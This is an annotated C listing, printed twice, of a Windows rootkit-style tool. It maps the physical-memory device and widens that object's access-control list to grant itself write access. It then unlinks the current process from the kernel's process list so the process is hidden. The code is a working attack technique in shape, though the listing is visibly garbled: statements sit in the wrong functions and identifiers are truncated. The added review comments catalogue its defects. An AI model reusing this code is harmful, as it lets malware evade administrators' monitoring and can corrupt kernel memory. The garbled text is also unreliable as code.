001 #include
002 //#include
003 #include
004
// Minimal native-API declarations so the program can call ZwOpenSection
// without the DDK headers. The status values match the ntstatus.h codes.
005 typedef LONG NTSTATUS;
006
// NT status codes are negative on failure; same test as the ntdef.h macro.
007 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
// Declared but not referenced anywhere in this listing.
008 #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
// Compared against the first ZwOpenSection result in OpenPhyMemObject.
009 #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
010
// Local copy of the native UNICODE_STRING layout (a counted string, not a
// NUL-terminated one). Filled in by RtlInitUnicodeString in OpenPhyMemObject.
011 typedef struct _UNICODE_STRING
012 {
013 USHORT Length;
014 USHORT MaximumLength;
015 PWSTR Buffer;
016 } UNICODE_STRING, *PUNICODE_STRING;
017
// Local copy of the native OBJECT_ATTRIBUTES layout. OpenPhyMemObject sets
// Length and ObjectName and zeroes every other field before ZwOpenSection
// (the field names in that function are garbled in this listing).
018 typedef struct _OBJECT_ATTRIBUTES
019 {
020 ULONG Length;
021 HANDLE RootDirectory;
022 PUNICODE_STRING ObjectName;
023 ULONG Attributes;
024 PVOID SecurityDescriptor;
025 PVOID SecurityQualityOfService;
026 } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
027
// Signatures for the two ntdll exports resolved at runtime with
// GetProcAddress. ZwOpenSection opens an existing section object by name;
// RtlInitUnicodeString wraps a NUL-terminated wide string in a
// UNICODE_STRING. IN/OUT/CALLBACK are the Win32 annotation macros.
// (Line "031" is an empty line inside the parameter list in this listing.)
028 typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
029 OUT PHANDLE SectionHandle,
030 IN ACCESS_MASK DesiredAccess,
031
032 IN POBJECT_ATTRIBUTES ObjectAttributes
033 );
034
035 typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
036 IN OUT PUNICODE_STRING DestinationString,
037 IN PCWSTR SourceString
038 );
039
// Process-wide state shared by every function below.
// ishide: set by main after hideprocess() reports success; read by both.
040 static bool ishide = false;
// hSection: the physical-memory section opened by OpenPhyMemObject. It is
// closed only on the ACCESS_DENIED retry path there, never on the normal path.
041 HANDLE hSection = NULL;
// mapPhyMemObject: view of the page at PhyDirAddress, passed to
// LinerAddressToPhysicAddress as the page-directory base. Never unmapped.
042 PVOID mapPhyMemObject = NULL;
043
// Translate a 32-bit virtual address to a physical address by walking a
// two-level page table whose page directory is already mapped at Base.
// Assumes 4-byte (non-PAE) entries: bit 0 = present, bit 7 = PS (4MB page).
// Returns 0 when either level is not present -- callers (GetData/SetData)
// do not distinguish that 0 from a real physical address 0.
//
// NOTE(review): the MapViewOfFile result in the 4KB branch is dereferenced
// without a NULL check, and the view is unmapped only when the PTE is
// present, so the early return at "063" leaks it. All arithmetic is ULONG,
// so this is 32-bit only.
044 PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
045 {
046 ULONG VAddress = (ULONG)address;
047 ULONG PDE,PTE,PAddress;
// Top 10 bits of the virtual address select the page-directory entry.
048 PDE = Base[VAddress>>22];
049 if((PDE&1)==0)
050 return 0;
051 ULONG PageFlage = PDE&0x00000080;
052 if (PageFlage != 0)
053 {
054 // PS bit set: 4MB page; the low 22 bits are the page offset.
055 PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
056 }
057 else
058 {
059 // PS bit clear: 4KB pages. Map the page table (the literal 4 is
// FILE_MAP_READ) and index it with address bits 21..12.
060 PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
061 PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];
062 if((PTE&1) == 0)
063 return 0;
064 PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
065 UnmapViewOfFile((PVOID)PDE);
066 }
067 return (PVOID)PAddress;
068 }
069
// Read one 32-bit value at kernel virtual address addr through the
// physical-memory section: translate, map the containing 4KB page, index it
// by the page offset, unmap. Returns 0 on failure and also when the value
// read is 0, so callers cannot tell the two apart.
//
// NOTE(review): this listing is garbled -- the "ULONG phys = ..." statement
// printed after "return ret;" belongs before the MapViewOfFile call, and
// "ddr);" is the tail of "addr);". The text below is not compilable as-is.
// Also, a translation failure (phys == 0) is not rejected, so the function
// then maps physical page 0 and returns a word from it.
070 ULONG GetData(PVOID addr)
071 {
072
ddr);
073 PULONG tmp =
(PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&
0xfffff000,0x1000);
074 if(tmp == 0)
075 return 0;
// Word index within the 4KB page.
076 ULONG ret = tmp[(phys&0xfff)>>2];
077 UnmapViewOfFile(tmp);
078 return ret;
ULONG phys =
(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a
079 }
080
// Write one 32-bit value to kernel virtual address addr through the
// physical-memory section (same translate/map/index/unmap sequence as
// GetData). Returns false if the page could not be mapped, TRUE otherwise.
//
// NOTE(review): in this listing the "ULONG phys = ..." and "PULONG tmp = ..."
// declarations that belong at "083"/"084" are printed, mis-placed, inside
// AddACEtoPhyMemObject; "ddr);" and ");" are their tails. As in GetData, a
// translation failure (phys == 0) is not rejected, so the write would land
// in physical page 0. Mixing "false" and "TRUE" as return values is a
// bool/BOOL inconsistency.
081 BOOL SetData(PVOID addr, ULONG data)
082 {
083
ddr);
084
);
085 if(tmp == 0)
086 return false;
087 tmp[(phys&0xfff)>>2] = data;
088 UnmapViewOfFile(tmp);
089 return TRUE;
090 }
091
// Append one GRANT_ACCESS ACE for SECTION_MAP_WRITE to the DACL of the
// section handle hSec and write the DACL back. Called only from the
// STATUS_ACCESS_DENIED retry in OpenPhyMemObject, with a handle opened for
// READ_CONTROL|WRITE_DAC.
//
// NOTE(review): none of GetSecurityInfo / SetEntriesInAcl / SetSecurityInfo
// return values are checked. If SetEntriesInAcl fails, pNewDacl stays NULL
// and SetSecurityInfo is asked to install a NULL DACL -- per the API docs
// that grants everyone access, i.e. weaker than before, not a no-op; confirm
// before relying on this path. A DACL rewrite on a kernel object is the kind
// of change object-access auditing records.
//
// The "ea." field names are partially lost in this listing: the real
// EXPLICIT_ACCESS members are grfAccessPermissions, grfAccessMode,
// grfInheritance, Trustee.TrusteeForm, Trustee.TrusteeType, Trustee.ptstrName.
092 void AddACEtoPhyMemObject(HANDLE hSec)
093 {
094 PACL pDacl = NULL;
095 PSECURITY_DESCRIPTOR pSD = NULL;
096 PACL pNewDacl = NULL;
// Fetch the current DACL; pDacl points into pSD, which is freed below.
097 GetSecurityInfo(hSec,
098 SE_KERNEL_OBJECT,
099 DACL_SECURITY_INFORMATION,
100 NULL,
101 NULL,
102 &pDacl,
103 NULL,
104 &pSD);
105
106 EXPLICIT_ACCESS ea;
107 RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
108 ea.g**ccessPermissions = SECTION_MAP_WRITE;
109 ea.g**ccessMode = GRANT_ACCESS;
110 eritance= NO_INHERITANCE;
111 eForm = TRUSTEE_IS_NAME;
112 eType = TRUSTEE_IS_USER;
// "CURRENT_USER" is the special trustee name the API resolves to the caller.
113 ame = "CURRENT_USER";
114
// Build a new DACL = old DACL + the entry above.
115 SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
// NOTE(review): the next four lines belong to SetData; extraction misplaced
// them here.
PULONG tmp =
(PULONG)MapViewOfFile(hSection,FILE_MAP_WRITE,0,phys&0xfffff000,0x1000
ULONG phys =
(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a
116
117 SetSecurityInfo(hSec,
118 SE_KERNEL_OBJECT,
119 DACL_SECURITY_INFORMATION,
120 NULL,
121 NULL,
122 pNewDacl,
123 NULL);
124
// Both buffers are API-allocated and must be released with LocalFree.
125 if(pSD)
126 LocalFree(pSD);
127 if(pNewDacl)
128 LocalFree(pNewDacl);
129 }
130
// Open the physical-memory section for read/write, store the handle in the
// global hSection, map the page at PhyDirAddress into mapPhyMemObject, and
// return hSection (NULL on failure). If the first open is denied, the object
// is reopened for READ_CONTROL|WRITE_DAC, its DACL is widened by
// AddACEtoPhyMemObject, and the open is retried.
//
// NOTE(review): several lines are garbled or displaced in this listing --
// the LoadLibrary name is empty (the two exports resolved suggest ntdll),
// the object name string lost its path separators, the "attributes." field
// names at "143".."148" are truncated, and the retry ZwOpenSection and the
// "mapPhyMemObject = MapViewOfFile(...)" statements (tails "utes);" at "159"
// and "x1000);" at "167") are printed inside hideprocess instead.
//
// Defects visible here: hNtdll and both GetProcAddress results are used
// unchecked; the status of the WRITE_DAC open is not checked before
// AddACEtoPhyMemObject uses hSection; FreeLibrary is skipped on the failure
// return; the MapViewOfFile result for mapPhyMemObject is never checked; and
// PhyDirAddress is a hard-coded physical address assumed to hold the page
// directory -- if that assumption is wrong for the running system, every
// later translation is garbage and SetData writes to arbitrary memory.
131 HANDLE OpenPhyMemObject()
132 {
133 NTSTATUS status;
134 UNICODE_STRING PhyMemObjectString;
135 OBJECT_ATTRIBUTES attributes;
// Physical address assumed to hold the page directory (see note above).
136 ULONG PhyDirAddress = 0x39000;
137
138 HMODULE hNtdll = LoadLibrary("");
139 RTLINITUNICODESTRING RtlInitUnicodeString =
140
(RTLINITUNICODESTRING)GetProcAddress(hNtdll,"RtlInitUnicodeString");
141
RtlInitUnicodeString(&PhyMemObjectString,L"DevicePhysicalMemory");
142
// Fill in OBJECT_ATTRIBUTES: Length, RootDirectory, ObjectName, Attributes,
// SecurityDescriptor, SecurityQualityOfService (names truncated in listing).
143 = sizeof(OBJECT_ATTRIBUTES);
144 rectory = NULL;
145 Name = &PhyMemObjectString;
146 utes = 0;
147 tyDescriptor = NULL;
148 tyQualityOfService = NULL;
149
150 ZWOPENSECTION ZwOpenSection =
151 (ZWOPENSECTION)GetProcAddress(hNtdll, "ZwOpenSection");
152
153 status =
ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attrib
utes);
// Access denied: reopen with DAC-write rights, widen the DACL, close, retry.
154 if(status == STATUS_ACCESS_DENIED)
155 {
156 status =
ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
157 AddACEtoPhyMemObject(hSection);
158 CloseHandle(hSection);
159
utes);
160 }
161 if(!NT_SUCCESS(status))
162 {
163 printf("opensection failed.n");
164 return NULL;
165 }
166
// Map the presumed page-directory page (statement displaced; tail below).
167
x1000);
168 FreeLibrary(hNtdll);
169 return hSection;
170 }
171
// Hide (hide == true) the current process by rewriting kernel memory through
// the physical-memory section. It reads a pointer from a fixed kernel
// address, follows hard-coded offsets (+0x44, +0x88, +0x8c) into kernel
// structures, and makes the flink/blink neighbours point at each other.
// Those constants are presumably valid for one specific 32-bit OS build only;
// on anything else the SetData calls write to unrelated kernel memory.
// The unhide path (hide == false) is an empty stub, so hideprocess(false)
// returns true without restoring anything.
//
// NOTE(review): OpenPhyMemObject is re-run on every call, leaking the
// previous hSection/mapPhyMemObject; none of the GetData results are checked
// (a 0 from a failed read is used as the next address); and the two SetData
// results are ignored, so a failure between them leaves the list
// half-rewritten. The four lines printed between "188" and "189" belong to
// OpenPhyMemObject (extraction artefact).
172 bool hideprocess(bool hide)
173 {
174 if(!OpenPhyMemObject())
175 {
176 printf("open physical memory failed.n");
177 return false;
178 }
179 ULONG thread = GetData((PVOID)0xffdff124);
180 ULONG process = GetData((PVOID)(thread + 0x44));
181 ULONG flink = GetData((PVOID)(process + 0x88));
182 ULONG blink = GetData((PVOID)(process + 0x8c));
183
184 if(hide == true && ishide == false)
185 {
// Unlink: next->prev = prev; prev->next = next. Return values ignored.
186 SetData((PVOID)(flink + 4),blink);
187 SetData((PVOID)(blink),flink);
188 }
mapPhyMemObject =
MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirAddress,0
status =
ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attrib
189 if(hide == false && ishide == true)
190 {
191 // unhide() -- not implemented; nothing is restored here.
192 }
193 return true;
194 }
195
// Interactive menu: 'h' hides, 'u' unhides, 'e' exits. ishide is updated
// only when hideprocess() reports success -- but since its unhide path is a
// stub that always returns true, 'u' clears ishide without undoing anything.
//
// NOTE(review): getchar() is stored in a char and never compared with EOF,
// so when stdin is closed the loop never sees 'e' and prints
// "unknown command." forever. The printf strings have lost their "\n"
// escapes in this listing ("hidenu" is "hide\nu", etc.).
196 int main()
197 {
198 char ch;
199 bool bExit = false;
200 bool bRet;
201
202 while(!bExit)
203 {
204 printf("h to hidenu to unhidene to exitn");
205 ch = getchar();
// Discard the newline that follows the command character.
206 getchar();
207 switch(ch)
208 {
209 case 'h':
210 if(ishide == true)
211 {
212 printf("the process is already hiden.n");
213 break;
214 }
215 bRet = hideprocess(true);
216 if(bRet)
217 {
218 printf("hide successfully.n");
219 ishide = true;
220 }
221 else
222 printf("hide failed.n");
223 break;
224 case 'u':
225 if(ishide == false)
226 {
227 printf("the process is not hiden.n");
228 break;
229 }
230 bRet = hideprocess(false);
231 if(bRet)
232 {
233 printf("unhide successfully.n");
234 ishide = false;
235 }
236 else
237 printf("unhide failed.n");
238 break;
239 case 'e':
240 bExit = true;
241 break;
242 default:
243 printf("unknown command.n");
244 break;
245 }
246 }
247
248 return 0;
249 }
001 #include
002 //#include
003 #include
004
// Minimal native-API declarations so the program can call ZwOpenSection
// without the DDK headers. The status values match the ntstatus.h codes.
005 typedef LONG NTSTATUS;
006
// NT status codes are negative on failure; same test as the ntdef.h macro.
007 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
// Declared but not referenced anywhere in this listing.
008 #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
// Compared against the first ZwOpenSection result in OpenPhyMemObject.
009 #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
010
// Local copy of the native UNICODE_STRING layout (a counted string, not a
// NUL-terminated one). Filled in by RtlInitUnicodeString in OpenPhyMemObject.
011 typedef struct _UNICODE_STRING
012 {
013 USHORT Length;
014 USHORT MaximumLength;
015 PWSTR Buffer;
016 } UNICODE_STRING, *PUNICODE_STRING;
017
// Local copy of the native OBJECT_ATTRIBUTES layout. OpenPhyMemObject sets
// Length and ObjectName and zeroes every other field before ZwOpenSection
// (the field names in that function are garbled in this listing).
018 typedef struct _OBJECT_ATTRIBUTES
019 {
020 ULONG Length;
021 HANDLE RootDirectory;
022 PUNICODE_STRING ObjectName;
023 ULONG Attributes;
024 PVOID SecurityDescriptor;
025 PVOID SecurityQualityOfService;
026 } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
027
// Signatures for the two ntdll exports resolved at runtime with
// GetProcAddress. ZwOpenSection opens an existing section object by name;
// RtlInitUnicodeString wraps a NUL-terminated wide string in a
// UNICODE_STRING. IN/OUT/CALLBACK are the Win32 annotation macros.
// (Line "031" is an empty line inside the parameter list in this listing.)
028 typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
029 OUT PHANDLE SectionHandle,
030 IN ACCESS_MASK DesiredAccess,
031
032 IN POBJECT_ATTRIBUTES ObjectAttributes
033 );
034
035 typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
036 IN OUT PUNICODE_STRING DestinationString,
037 IN PCWSTR SourceString
038 );
039
// Process-wide state shared by every function below.
// ishide: set by main after hideprocess() reports success; read by both.
040 static bool ishide = false;
// hSection: the physical-memory section opened by OpenPhyMemObject. It is
// closed only on the ACCESS_DENIED retry path there, never on the normal path.
041 HANDLE hSection = NULL;
// mapPhyMemObject: view of the page at PhyDirAddress, passed to
// LinerAddressToPhysicAddress as the page-directory base. Never unmapped.
042 PVOID mapPhyMemObject = NULL;
043
// Translate a 32-bit virtual address to a physical address by walking a
// two-level page table whose page directory is already mapped at Base.
// Assumes 4-byte (non-PAE) entries: bit 0 = present, bit 7 = PS (4MB page).
// Returns 0 when either level is not present -- callers (GetData/SetData)
// do not distinguish that 0 from a real physical address 0.
//
// NOTE(review): the MapViewOfFile result in the 4KB branch is dereferenced
// without a NULL check, and the view is unmapped only when the PTE is
// present, so the early return at "063" leaks it. All arithmetic is ULONG,
// so this is 32-bit only.
044 PVOID LinerAddressToPhysicAddress(PULONG Base, PVOID address)
045 {
046 ULONG VAddress = (ULONG)address;
047 ULONG PDE,PTE,PAddress;
// Top 10 bits of the virtual address select the page-directory entry.
048 PDE = Base[VAddress>>22];
049 if((PDE&1)==0)
050 return 0;
051 ULONG PageFlage = PDE&0x00000080;
052 if (PageFlage != 0)
053 {
054 // PS bit set: 4MB page; the low 22 bits are the page offset.
055 PAddress = (PDE&0xffc00000) + (VAddress&0x003fffff);
056 }
057 else
058 {
059 // PS bit clear: 4KB pages. Map the page table (the literal 4 is
// FILE_MAP_READ) and index it with address bits 21..12.
060 PDE = (ULONG)MapViewOfFile(hSection,4,0,PDE&0xfffff000,0x1000);
061 PTE = ((PULONG)PDE)[(VAddress&0x003ff000)>>12];
062 if((PTE&1) == 0)
063 return 0;
064 PAddress = (PTE&0xfffff000)+(VAddress&0x00000fff);
065 UnmapViewOfFile((PVOID)PDE);
066 }
067 return (PVOID)PAddress;
068 }
069
// Read one 32-bit value at kernel virtual address addr through the
// physical-memory section: translate, map the containing 4KB page, index it
// by the page offset, unmap. Returns 0 on failure and also when the value
// read is 0, so callers cannot tell the two apart.
//
// NOTE(review): this listing is garbled -- the "ULONG phys = ..." statement
// printed after "return ret;" belongs before the MapViewOfFile call, and
// "ddr);" is the tail of "addr);". The text below is not compilable as-is.
// Also, a translation failure (phys == 0) is not rejected, so the function
// then maps physical page 0 and returns a word from it.
070 ULONG GetData(PVOID addr)
071 {
072
ddr);
073 PULONG tmp =
(PULONG)MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,phys&
0xfffff000,0x1000);
074 if(tmp == 0)
075 return 0;
// Word index within the 4KB page.
076 ULONG ret = tmp[(phys&0xfff)>>2];
077 UnmapViewOfFile(tmp);
078 return ret;
ULONG phys =
(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a
079 }
080
// Write one 32-bit value to kernel virtual address addr through the
// physical-memory section (same translate/map/index/unmap sequence as
// GetData). Returns false if the page could not be mapped, TRUE otherwise.
//
// NOTE(review): in this listing the "ULONG phys = ..." and "PULONG tmp = ..."
// declarations that belong at "083"/"084" are printed, mis-placed, inside
// AddACEtoPhyMemObject; "ddr);" and ");" are their tails. As in GetData, a
// translation failure (phys == 0) is not rejected, so the write would land
// in physical page 0. Mixing "false" and "TRUE" as return values is a
// bool/BOOL inconsistency.
081 BOOL SetData(PVOID addr, ULONG data)
082 {
083
ddr);
084
);
085 if(tmp == 0)
086 return false;
087 tmp[(phys&0xfff)>>2] = data;
088 UnmapViewOfFile(tmp);
089 return TRUE;
090 }
091
// Append one GRANT_ACCESS ACE for SECTION_MAP_WRITE to the DACL of the
// section handle hSec and write the DACL back. Called only from the
// STATUS_ACCESS_DENIED retry in OpenPhyMemObject, with a handle opened for
// READ_CONTROL|WRITE_DAC.
//
// NOTE(review): none of GetSecurityInfo / SetEntriesInAcl / SetSecurityInfo
// return values are checked. If SetEntriesInAcl fails, pNewDacl stays NULL
// and SetSecurityInfo is asked to install a NULL DACL -- per the API docs
// that grants everyone access, i.e. weaker than before, not a no-op; confirm
// before relying on this path. A DACL rewrite on a kernel object is the kind
// of change object-access auditing records.
//
// The "ea." field names are partially lost in this listing: the real
// EXPLICIT_ACCESS members are grfAccessPermissions, grfAccessMode,
// grfInheritance, Trustee.TrusteeForm, Trustee.TrusteeType, Trustee.ptstrName.
092 void AddACEtoPhyMemObject(HANDLE hSec)
093 {
094 PACL pDacl = NULL;
095 PSECURITY_DESCRIPTOR pSD = NULL;
096 PACL pNewDacl = NULL;
// Fetch the current DACL; pDacl points into pSD, which is freed below.
097 GetSecurityInfo(hSec,
098 SE_KERNEL_OBJECT,
099 DACL_SECURITY_INFORMATION,
100 NULL,
101 NULL,
102 &pDacl,
103 NULL,
104 &pSD);
105
106 EXPLICIT_ACCESS ea;
107 RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
108 ea.g**ccessPermissions = SECTION_MAP_WRITE;
109 ea.g**ccessMode = GRANT_ACCESS;
110 eritance= NO_INHERITANCE;
111 eForm = TRUSTEE_IS_NAME;
112 eType = TRUSTEE_IS_USER;
// "CURRENT_USER" is the special trustee name the API resolves to the caller.
113 ame = "CURRENT_USER";
114
// Build a new DACL = old DACL + the entry above.
115 SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
// NOTE(review): the next four lines belong to SetData; extraction misplaced
// them here.
PULONG tmp =
(PULONG)MapViewOfFile(hSection,FILE_MAP_WRITE,0,phys&0xfffff000,0x1000
ULONG phys =
(ULONG)LinerAddressToPhysicAddress((PULONG)mapPhyMemObject,(PVOID)a
116
117 SetSecurityInfo(hSec,
118 SE_KERNEL_OBJECT,
119 DACL_SECURITY_INFORMATION,
120 NULL,
121 NULL,
122 pNewDacl,
123 NULL);
124
// Both buffers are API-allocated and must be released with LocalFree.
125 if(pSD)
126 LocalFree(pSD);
127 if(pNewDacl)
128 LocalFree(pNewDacl);
129 }
130
// Open the physical-memory section for read/write, store the handle in the
// global hSection, map the page at PhyDirAddress into mapPhyMemObject, and
// return hSection (NULL on failure). If the first open is denied, the object
// is reopened for READ_CONTROL|WRITE_DAC, its DACL is widened by
// AddACEtoPhyMemObject, and the open is retried.
//
// NOTE(review): several lines are garbled or displaced in this listing --
// the LoadLibrary name is empty (the two exports resolved suggest ntdll),
// the object name string lost its path separators, the "attributes." field
// names at "143".."148" are truncated, and the retry ZwOpenSection and the
// "mapPhyMemObject = MapViewOfFile(...)" statements (tails "utes);" at "159"
// and "x1000);" at "167") are printed inside hideprocess instead.
//
// Defects visible here: hNtdll and both GetProcAddress results are used
// unchecked; the status of the WRITE_DAC open is not checked before
// AddACEtoPhyMemObject uses hSection; FreeLibrary is skipped on the failure
// return; the MapViewOfFile result for mapPhyMemObject is never checked; and
// PhyDirAddress is a hard-coded physical address assumed to hold the page
// directory -- if that assumption is wrong for the running system, every
// later translation is garbage and SetData writes to arbitrary memory.
131 HANDLE OpenPhyMemObject()
132 {
133 NTSTATUS status;
134 UNICODE_STRING PhyMemObjectString;
135 OBJECT_ATTRIBUTES attributes;
// Physical address assumed to hold the page directory (see note above).
136 ULONG PhyDirAddress = 0x39000;
137
138 HMODULE hNtdll = LoadLibrary("");
139 RTLINITUNICODESTRING RtlInitUnicodeString =
140
(RTLINITUNICODESTRING)GetProcAddress(hNtdll,"RtlInitUnicodeString");
141
RtlInitUnicodeString(&PhyMemObjectString,L"DevicePhysicalMemory");
142
// Fill in OBJECT_ATTRIBUTES: Length, RootDirectory, ObjectName, Attributes,
// SecurityDescriptor, SecurityQualityOfService (names truncated in listing).
143 = sizeof(OBJECT_ATTRIBUTES);
144 rectory = NULL;
145 Name = &PhyMemObjectString;
146 utes = 0;
147 tyDescriptor = NULL;
148 tyQualityOfService = NULL;
149
150 ZWOPENSECTION ZwOpenSection =
151 (ZWOPENSECTION)GetProcAddress(hNtdll, "ZwOpenSection");
152
153 status =
ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attrib
utes);
// Access denied: reopen with DAC-write rights, widen the DACL, close, retry.
154 if(status == STATUS_ACCESS_DENIED)
155 {
156 status =
ZwOpenSection(&hSection,READ_CONTROL|WRITE_DAC,&attributes);
157 AddACEtoPhyMemObject(hSection);
158 CloseHandle(hSection);
159
utes);
160 }
161 if(!NT_SUCCESS(status))
162 {
163 printf("opensection failed.n");
164 return NULL;
165 }
166
// Map the presumed page-directory page (statement displaced; tail below).
167
x1000);
168 FreeLibrary(hNtdll);
169 return hSection;
170 }
171
// Hide (hide == true) the current process by rewriting kernel memory through
// the physical-memory section. It reads a pointer from a fixed kernel
// address, follows hard-coded offsets (+0x44, +0x88, +0x8c) into kernel
// structures, and makes the flink/blink neighbours point at each other.
// Those constants are presumably valid for one specific 32-bit OS build only;
// on anything else the SetData calls write to unrelated kernel memory.
// The unhide path (hide == false) is an empty stub, so hideprocess(false)
// returns true without restoring anything.
//
// NOTE(review): OpenPhyMemObject is re-run on every call, leaking the
// previous hSection/mapPhyMemObject; none of the GetData results are checked
// (a 0 from a failed read is used as the next address); and the two SetData
// results are ignored, so a failure between them leaves the list
// half-rewritten. The four lines printed between "188" and "189" belong to
// OpenPhyMemObject (extraction artefact).
172 bool hideprocess(bool hide)
173 {
174 if(!OpenPhyMemObject())
175 {
176 printf("open physical memory failed.n");
177 return false;
178 }
179 ULONG thread = GetData((PVOID)0xffdff124);
180 ULONG process = GetData((PVOID)(thread + 0x44));
181 ULONG flink = GetData((PVOID)(process + 0x88));
182 ULONG blink = GetData((PVOID)(process + 0x8c));
183
184 if(hide == true && ishide == false)
185 {
// Unlink: next->prev = prev; prev->next = next. Return values ignored.
186 SetData((PVOID)(flink + 4),blink);
187 SetData((PVOID)(blink),flink);
188 }
mapPhyMemObject =
MapViewOfFile(hSection,FILE_MAP_READ|FILE_MAP_WRITE,0,PhyDirAddress,0
status =
ZwOpenSection(&hSection,SECTION_MAP_READ|SECTION_MAP_WRITE,&attrib
189 if(hide == false && ishide == true)
190 {
191 // unhide() -- not implemented; nothing is restored here.
192 }
193 return true;
194 }
195
// Interactive menu: 'h' hides, 'u' unhides, 'e' exits. ishide is updated
// only when hideprocess() reports success -- but since its unhide path is a
// stub that always returns true, 'u' clears ishide without undoing anything.
//
// NOTE(review): getchar() is stored in a char and never compared with EOF,
// so when stdin is closed the loop never sees 'e' and prints
// "unknown command." forever. The printf strings have lost their "\n"
// escapes in this listing ("hidenu" is "hide\nu", etc.).
196 int main()
197 {
198 char ch;
199 bool bExit = false;
200 bool bRet;
201
202 while(!bExit)
203 {
204 printf("h to hidenu to unhidene to exitn");
205 ch = getchar();
// Discard the newline that follows the command character.
206 getchar();
207 switch(ch)
208 {
209 case 'h':
210 if(ishide == true)
211 {
212 printf("the process is already hiden.n");
213 break;
214 }
215 bRet = hideprocess(true);
216 if(bRet)
217 {
218 printf("hide successfully.n");
219 ishide = true;
220 }
221 else
222 printf("hide failed.n");
223 break;
224 case 'u':
225 if(ishide == false)
226 {
227 printf("the process is not hiden.n");
228 break;
229 }
230 bRet = hideprocess(false);
231 if(bRet)
232 {
233 printf("unhide successfully.n");
234 ishide = false;
235 }
236 else
237 printf("unhide failed.n");
238 break;
239 case 'e':
240 bExit = true;
241 break;
242 default:
243 printf("unknown command.n");
244 break;
245 }
246 }
247
248 return 0;
249 }